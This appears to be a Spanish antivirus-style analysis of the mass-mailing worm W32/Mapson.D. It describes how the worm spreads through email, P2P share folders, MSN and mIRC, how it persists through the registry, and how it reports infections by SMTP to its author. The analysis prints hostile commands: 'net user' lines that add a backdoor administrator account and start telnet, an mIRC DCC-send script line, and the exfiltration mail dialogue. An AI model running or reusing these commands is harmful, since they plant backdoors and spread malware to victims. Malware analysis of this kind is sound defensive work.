Nombre : W32/Mapson.D Autor : Falckon Origen : Mexico Tamaño : 179 KB Binario : Binarios\I-Worm.Mapson.D.Zip Alias : W32/Mapson.D@mm, I.worm.Mapson.D@mm Mapson.D es un gusano de alta propagación masiva a través de mensajes de correo con Asuntos, Contenidos y archivos Anexados, elegidos en forma aleatoria. Se difunde además vía la mayoría de redes Peer to Peer, MSN Messenger, el ICQ, redes con recursos compartidos y el IRC (Internet Chat Relay). Además reporta a su autor información de las infecciones que realiza. Como en sus versiones anteriores deshabilita antivirus, firewalls y sistemas de control. El gusano infecta Windows 95/98/NT/Me/2000/XP, incluyendo los servidores NT/2000/Server 2003, está desarrollado en Borland Delphi, tiene 180 KB de extensión y comprimido con el utilitario UPX (Ultimate Packer for eXecutables): http://upx.sourceforge.net Para auto-enviarse masivamente por correo a todos los buzones de correo de la Libreta de Direcciones de MS Outlook y a la Libreta Global de Windows WAB (Windows Address Book), emplea el componente TNMSMTP de FastNeT Tools para los lenguajes de programación de Borland. Adicionalmente busca las cuentas de correo del MSN Messenger en las siguientes llaves de registro: [Software\Microsoft\MessengerService\ListCache\.NET Messenger Service] [Software\Microsoft\MSNMessenger\ListCache\.NET Messenger Service] Los mensajes tienen las siguientes características: Remitente, emplea la técnica Email spoofing, que disfraza las verdaderas direcciones de los Remitentes. Asimismo usa las direcciones extraídas del sistema infectado ó alternativamente usa la dirección electrónica virus@viruses.com Anexado, cualquiera de los siguientes: Q832645.exe newmail.scr privacidad.pif cuentashotmail.pif www.huevosymashuevos.com extreme.pif vulnerabildades.pif playa_cancun.pif avergara.scr britney.scr www.vsantivirus.com engrupo.pif disfuncion.pif orgasmo.pif Anti-Blaster.exe pareja.pif antirundll.exe sharekaza.exe nuevovirus.txt.pif kamasutra.pif parejaideal.pif amores.pif chicas.pif Hacker-Bible.pif viruses.pif K54403.exe microsoft@microsoftupdate.com mailcrack.bat virus-list.pif virus-faq.pif animaciones.pif posiciones.exe confidencial.pif readme.pif muy-interesante.pif confidential-information.pif juan@ivan-ich.com JuegoconlosMuertos.pif sexual-positions.bat foto-alemania.pif lovecard.bat consejos-mujeres.bat chica-sex.scr hotmailhacker.exe hackwebs.exe hotmailhack.pif generatorviruses.exe shakira.scr girlpic.pif Anti-BlasterWorm.exe MatrixReloaded.scr Paulina-rubio-cameron-diaz.scr Drivers-Windows.exe Al ejecutar el archivo infectado el gusano se copia al directorio raíz como C:\Falckon.vxd y a la carpeta %System% con los siguientes nombres: privacidad.pif cuentashotmail.pif extreme.pif vulnerabildades.pif playa_cancun.pif avergara.scr britney.scr engrupo.pif disfuncion.pif orgasmo.pif Anti-Blaster.exe pareja.pif sharekaza.exe kamasutra.pif parejaideal.pif amores.pif chicas.pif Hacker-Bible.pif viruses.pif mailcrack.bat animaciones.pif posiciones.exe confidencial.pif readme.pif muy-interesante.pif juan@ivan-ich.com JuegoconlosMuertos.pif sexual-positions.bat foto-alemania.pif lovecard.bat consejos-mujeres.bat chica-sex.scr hotmailhacker.exe hackwebs.exe hotmailhack.pif generatorviruses.exe shakira.scr girlpic.pif Anti-BlasterWorm.exe MatrixReloaded.scr Paulina-rubio-cameron-diaz.scr Drivers-Windows.exe contraseñas.pif Para ejecutarse la próxima vez que se inicie el sistema, el gusano crea la siguiente llave de registro: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] "NAV" = "%System%\rundll32.exe" %System% es la variable C:\Windows\System para Windows 95/98/Me, C:\Winnt\System32 para Windows NT/2000 y C:\Windows\System32 para Windows XP y Windows Server 2003. Asimismo, Mapson.D se copia a las siguientes rutas: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ C:\Windows\Start Menu\Programs\Startup\ C:\Windows\Menú inicio\Programas\Inicio\ C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup\ C:\autoexec.bat Para infectar a través de las redes Peer to Peer, el gusano se auto-copia a las carpetas: \KaZaA\My Shared Folder \edonkey2000\incoming \gnucleus\downloads \icq\shared files \kazaa lite\My Shared Folder \limewire\shared\ \morpheus\my shared folder \Grokster\My Grokster \WinMX\My Shared Folder \Tesla\Files \Overnet\Incoming \XoloX\Downloads \Rapigator\Share \KMD\My Shared Folder Con los siguientes nombres: Kazaa Media Desktop.exe AOL Instant Messenger.exe ICQ ro 2003a beta.exe Download Accelerator plus.exe ZoneAlarm.exe DivX Video Bundle.exe RealOne Free Player.exe Adobe Acrobat Reader.exe JetAudio Basic.exe WS_FT.exe Registry Mechanic.exe MSN Messenger.exe Biromsoft WebCam.exe Nero Burning ROM.exe Microsoft Windows Media Player.exe Sybot.exe Copernic Agent.exe Diet Kazaa.exe SolSuite 2003.exe pop-Up Stoper.exe QuickTime.exe XoloX Ultra.exe Microsoft Internet Exlorer.exe Network Cable e ADSL Speed.exe Kazaa Download Accelerator.exe Global DiVX layer.exe DirectDVD.exe Kasersky Antivirus.exe PerAntivirus.exe Norton Antivirus.exe Panda Antivirus.exe McAfee Antivirus.exe Microsoft Office XP.exe Microsoft Windows 2003.exe Office 2003.exe Visual Studio Net.exe Matrix Movie.exe Virtual Girl.exe FireWorks 4.exe FIreWorks MX.exe Para difundirse por el IRC (Internet Chat Relay) el gusano modifica el SCRIPT.INI del software mIRC con las siguientes líneas cifradas: n0=On 1:JOIN:#:{/if ( $nick == $me) { halt } | .privmsg $nick | /dcc Send -c $nick En Windows NT/2000/XP ó Server 2003, el gusano crea un usuario con privilegios de Administrador con las siguientes instrucciones: cmd.exe /c net user GEDZAC gedzac /add cmd.exe /c net localgroup "Administrators" GEDZAC /add cmd.exe /c net start "telnet" Este gusano emplea su propio SMTP (Simple Mail Transfer Protocol) para enviar un correo al autor del virus cada vez que una PC infectada se conecta a Internet, usando las siguientes instrucciones: smtp.prodigy.net.mx Helo localhost MAIL FROM: ajh@prodigy.net.mx RCPT TO: infectados@virusmex.zzn.com FROM: Falckon@GEDZAC.net To: infectados@virusmex.zzn.com Subject: New Infected Mapson.D Reporting to the GEDZAC LABs Infection Date: Infection Time: ICountry: Registered Org: Reg. Onwer: OS: IP: [GEDZAC LABS] Dentro del código del virus se puede leer el siguiente texto: Thx to All my VX Friends specially SlageHammer VirusBstr Positron VB : Thx for the GhostApp Component :D Slage : Thx for the 5 msgs to my worm :D and ur counsels Positron: to ur SMTP engine 0.9 i study and learn sockets :D Thx to All Mabel i love u :P Mapson.D Created by Falckon/GEDZAC THE FINAL VERSION